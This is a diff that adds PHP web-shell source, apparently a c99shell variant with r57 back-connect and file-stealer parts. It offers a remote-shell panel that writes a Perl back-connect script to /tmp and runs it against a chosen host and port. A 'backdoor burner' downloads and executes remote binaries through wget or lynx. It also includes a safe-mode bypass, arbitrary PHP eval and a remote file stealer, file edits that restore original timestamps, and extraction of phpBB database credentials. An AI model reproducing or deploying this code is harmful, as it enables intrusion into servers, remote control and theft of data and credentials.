+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; 
+  echo "<option value=md5file".($dspact == "md5file"?" selected":"").">MD5 Checksum</option>"; 
+  echo "<option value=sha1file".($dspact == "sha1file"?" selected":"").">SHA1 Checksum</option>"; 
+  if ($usefsbuff) 
+  { 
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; 
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; 
+   echo '<option value=unselect'.($dspact == "unselect"?" selected":"").'>Unselect</option>';
+  } 
+  echo '</select> <input type=submit value="Confirm"></p></form>';
+ } 
+} 
+if ($act == 'tools') 
+{ 
+?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height=1 valign=top colspan=2><center><b>:: Bind Functions By r57 ::</b></center>
+</td></tr>
+<tr><td width=50% height=83 valign=top>
+<center>
+<form action="<?php echo $surl; ?>">
+<b>Bind With Backd00r Burner</b><br>
+<form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools>
+<br>
+<select size=1 name="dolma"><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select> <input type=submit value="Burn it Baby"></form>
+</td><td width=50% height=83 valign=top>
+<center>
+<b>Back-Connection</b>
+<br><br>
+<form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=<?php echo $ip;?>> Port: <input type=text name=backconnectport size=15 value=5992><br>
+Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>
+First, run NetCat on your computer using '<b>nc -l -n -v -p <?php echo $bc_port; ?></b>'.<br>
+Then, click "Connect" once the port is listening.
+</center>
+</td></tr>
+</table>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height=1 valign=top colspan=2><center><b>:: File Stealer Function Ripped From Tontonq's File Stealer ::</b></center></td></tr>
+<tr>
+  <td width=50% height=83 valign=top>
+    <center><b>Safe-Mode Bypass</b>
+    <form action="<?php echo $surl; ?>" method=POST>
+    <input type=hidden name=act value=tools>
+    <textarea name="erorr" cols=100 rows=10></textarea></br>
+    <input type="text" name="nere" value="<?echo $real.'index.php';?> "size=84>
+    <input type="submit" value="Write to File">
+    
+    </form>
+    </center>
+    </td>
+  <td width=50% height=83 valign=top>
+   <center>
+   <form action="<?php echo $surl; ?>" method=POST>
+   <input type=hidden name=act value=tools>
+   Dosyanin Adresi ? = <input type=text name=dosyaa size=81 maxlength=500><br><br> 
+Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo $real.'sploitz.zip'; ?>"><br><br> 
+<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> 
+</form>
+</center>
+</td></tr>
+</table>
+<?php 
+
+if (isset($_POST['dosyaa']))
+{
+dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
+
+}
+if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) 
+{ 
+ cf("/tmp/back",$back_connect); 
+ $p2=which("perl"); 
+ $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); 
+echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; 
+} 
+if (!empty($_GET['dolma'])) 
+{  
+$sayko=htmlspecialchars($_GET['dolma']); 
+if ($sayko == "wgetcan") 
+{ 
+
+myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+
+} 
+
+else if ($sayko =="freadcan") 
+{ 
+dosyayicek($adires,"sayko_bind");
+myshellexec("./sayko_bind");
+} 
+
+else if ($sayko == "lynxcan") 
+{ 
+myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+} 
+
+
+
+
+
+} 
+
+if  (!empty($_POST['erorr'])) 
+{
+
+
+
+error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
+
+
+
+}
+
+
+
+
+
+
+
+
+
+} 
+if ($act == "processes") 
+{ 
+ echo "<b>Processes:</b><br>"; 
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} 
+ else {$handler = "tasklist";} 
+ $ret = myshellexec($handler); 
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";} 
+ else 
+ { 
+  if (empty($processes_sort)) {$processes_sort = $sort_default;} 
+  $parsesort = parsesort($processes_sort); 
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} 
+  $k = $parsesort[0]; 
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  $ret = htmlspecialchars($ret); 
+  if (!$win) 
+  { 
+   if ($pid) 
+   { 
+    if (is_null($sig)) {$sig = 9;} 
+    echo "Sending signal ".$sig." to #".$pid."... "; 
+    if (posix_kill($pid,$sig)) {echo "OK.";} 
+    else {echo "ERROR.";} 
+   } 
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);} 
+   $stack = explode("\n",$ret); 
+   $head = explode(" ",$stack[0]); 
+   unset($stack[0]); 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+{ 
+ echo "<tr>"; 
+     $line = explode(" ",$line); 
+     $line[10] = join(" ",array_slice($line,10)); 
+     $line = array_slice($line,0,11); 
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} 
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; 
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  else 
+  { 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);} 
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   $stack = explode("\n",$ret); 
+   unset($stack[0],$stack[2]); 
+   $stack = array_values($stack); 
+   $head = explode("",$stack[0]); 
+   $head[1] = explode(" ",$head[1]); 
+   $head[1] = $head[1][0]; 
+   $stack = array_slice($stack,1); 
+   unset($head[2]); 
+   $head = array_values($head); 
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   if ($k > count($head)) {$k = count($head)-1;} 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+    { 
+     echo "<tr>"; 
+     $line = explode("",$line); 
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); 
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  $head[$k] = "<b>".$head[$k]."</b>".$y; 
+  $v = $processes_sort[0]; 
+  usort($prcs,"tabsort"); 
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} 
+  $tab = array(); 
+  $tab[] = $head; 
+  $tab = array_merge($tab,$prcs); 
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; 
+  foreach($tab as $i=>$k) 
+  { 
+   echo "<tr>"; 
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} 
+   echo "</tr>"; 
+  } 
+  echo "</table>"; 
+ } 
+} 
+if ($act == "eval") 
+{ 
+ if (!empty($eval)) 
+ { 
+  echo "<b>Result of execution this PHP-code</b>:<br>"; 
+  $tmp = ob_get_contents(); 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  if ($tmp) 
+  { 
+   ob_clean(); 
+   eval($eval); 
+   $ret = ob_get_contents(); 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   ob_clean(); 
+   echo $tmp; 
+   if ($eval_txt) 
+   { 
+    $rows = count(explode("\r\n",$ret))+1; 
+    if ($rows < 10) {$rows = 10;} 
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+   } 
+   else {echo $ret."<br>";} 
+  } 
+  else 
+  { 
+   if ($eval_txt) 
+   { 
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; 
+    eval($eval); 
+    echo "</textarea>"; 
+   } 
+   else {echo $ret;} 
+  } 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; 
+} 
+if ($act == "f") 
+{ 
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") 
+ { 
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} 
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} 
+ } 
+ else 
+ { 
+  $r = @file_get_contents($d.$f); 
+  $ext = explode(".",$f); 
+  $c = count($ext)-1; 
+  $ext = $ext[$c]; 
+  $ext = strtolower($ext); 
+  $rft = ""; 
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} 
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} 
+  if (empty($ft)) {$ft = $rft;} 
+  $arr = array( 
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), 
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), 
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), 
+   array("Code","code"), 
+   array("Session","phpsess"), 
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), 
+   array("SDB","sdb"), 
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), 
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), 
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), 
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), 
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") 
+  ); 
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; 
+  foreach($arr as $t) 
+  { 
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} 
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} 
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} 
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; 
+  } 
+  echo "<hr size=\"1\" noshade>"; 
+  if ($ft == "info") 
+  { 
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; 
+   if (!$win) 
+   { 
+    echo "<tr><td><b>Owner/Group</b></td><td> ";     
+    $ow = posix_getpwuid(fileowner($d.$f)); 
+    $gr = posix_getgrgid(filegroup($d.$f)); 
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); 
+   } 
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; 
+   $fi = fopen($d.$f,"rb"); 
+   if ($fi) 
+   { 
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} 
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} 
+    $n = 0; 
+    $a0 = "00000000<br>"; 
+    $a1 = ""; 
+    $a2 = ""; 
+    for ($i=0; $i<strlen($str); $i++) 
+    { 
+     $a1 .= sprintf("%02X",ord($str[$i]))." "; 
+     switch (ord($str[$i])) 
+     { 
+      case 0:  $a2 .= "<font>0</font>"; break; 
+      case 32: 
+      case 10: 
+      case 13: $a2 .= "&nbsp;"; break; 
+      default: $a2 .= htmlspecialchars($str[$i]); 
+     } 
+     $n++; 
+     if ($n == $hexdump_rows) 
+     { 
+      $n = 0; 
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} 
+      $a1 .= "<br>"; 
+      $a2 .= "<br>"; 
+     } 
+    } 
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} 
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; 
+   } 
+   $encoded = ""; 
+   if ($base64 == 1) 
+   { 
+    echo "<b>Base64 Encode</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+   } 
+   elseif($base64 == 2) 
+   { 
+    echo "<b>Base64 Encode + Chunk</b><br>"; 
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); 
+   } 
+   elseif($base64 == 3) 
+   { 
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); 
+   } 
+   elseif($base64 == 4) 
+   { 
+    $text = file_get_contents($d.$f); 
+    $encoded = base64_decode($text); 
+    echo "<b>Base64 Decode"; 
+    if (base64_encode($encoded) != $text) {echo " (failed)";} 
+    echo "</b><br>"; 
+   } 
+   if (!empty($encoded)) 
+   { 
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; 
+   } 
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> 
+<P>"; 
+  } 
+  elseif ($ft == "html") 
+  { 
+   if ($white) {@ob_clean();} 
+   echo $r; 
+   if ($white) {c99shexit();} 
+  } 
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} 
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} 
+  elseif ($ft == "phpsess") 
+  { 
+   echo "<pre>"; 
+   $v = explode("|",$r); 
+   echo $v[0]."<br>"; 
+   var_dump(unserialize($v[1])); 
+   echo "</pre>"; 
+  } 
+  elseif ($ft == "exe") 
+  { 
+   $ext = explode(".",$f); 
+   $c = count($ext)-1; 
+   $ext = $ext[$c]; 
+   $ext = strtolower($ext); 
+   $rft = ""; 
+   foreach($exeftypes as $k=>$v) 
+   { 
+    if (in_array($ext,$v)) {$rft = $k; break;} 
+   } 
+   $cmd = str_replace("%f%",$f,$rft); 
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; 
+  } 
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} 
+  elseif ($ft == "code") 
+  { 
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) 
+   { 
+    $arr = explode("\n",$r); 
+    if (count($arr == 18)) 
+    { 
+     include($d.$f); 
+     echo "<b>phpBB configuration is detected in this file!<br>"; 
+     if ($dbms == "mysql4") {$dbms = "mysql";} 
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} 
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} 
+     echo "Parameters for manual connect:<br>"; 
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); 
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} 
+     echo "</b><hr size=\"1\" noshade>"; 
+    } 
+   } 
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; 
+   if (!empty($white)) {@ob_clean();} 
+   highlight_file($d.$f); 
+   if (!empty($white)) {c99shexit();} 
+   echo "</div>"; 
+  } 
+  elseif ($ft == "download") 
+  { 
+   @ob_clean(); 
+   header("Content-type: application/octet-stream"); 
+   header("Content-length: ".filesize($d.$f)); 
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo $r; 
+   exit; 
+  } 
+  elseif ($ft == "notepad") 
+  { 
+   @ob_clean(); 
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit; 
+  } 
+  elseif ($ft == "img") 
+  { 
+   $inf = getimagesize($d.$f); 
+   if (!$white) 
+   { 
+    if (empty($imgsize)) {$imgsize = 20;} 
+    $width = $inf[0]/100*$imgsize; 
+    $height = $inf[1]/100*$imgsize; 
+    echo "<center><b>Size:</b>&nbsp;"; 
+    $sizes = array("100","50","20"); 
+    foreach ($sizes as $v) 
+    { 
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; 
+     if ($imgsize != $v ) {echo $v;} 
+     else {echo "<u>".$v."</u>";} 
+     echo "%</a>&nbsp;&nbsp;"; 
+    } 
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; 
+   } 
+   else 
+   { 
+    @ob_clean(); 
+    $ext = explode($f,"."); 
+    $ext = $ext[count($ext)-1]; 
+    header("Content-type: ".$inf["mime"]); 
+    readfile($d.$f); 
+    exit; 
+   } 
+  } 
+  elseif ($ft == "edit") 
+  { 
+   if (!empty($submit)) 
+   { 
+    if ($filestealth) {$stat = stat($d.$f);} 
+    $fp = fopen($d.$f,"w"); 
+    if (!$fp) {echo "<b>Can't write to file!</b>";} 
+    else 
+    { 
+     echo "<b>Saved!</b>"; 
+     fwrite($fp,$edit_text); 
+     fclose($fp); 
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} 
+     $r = $edit_text; 
+    } 
+   } 
+   $rows = count(explode("\r\n",$r)); 
+   if ($rows < 10) {$rows = 10;} 
+   if ($rows > 30) {$rows = 30;} 
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; 
+  } 
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} 
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} 
+ } 
+} 
+} 
+else 
+{ 
+ @ob_clean(); 
+ $images = array( 
+"arrow_ltr"=> 
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", 
+"back"=> 
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". 
+"Wg0JADs=", 
+"buffer"=> 
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". 
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", 
+"change"=> 
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". 
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". 
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". 
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". 
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". 
+"zMshADs=", 
+"delete"=> 
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". 
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". 
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". 
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". 
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". 
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". 
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7", 
+"download"=> 
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". 
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", 
+"forward"=> 
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". 
+"WqsJADs=", 
+"home"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". 
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", 
+"mode"=> 
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". 
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", 
+"refresh"=> 
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". 
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". 
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". 
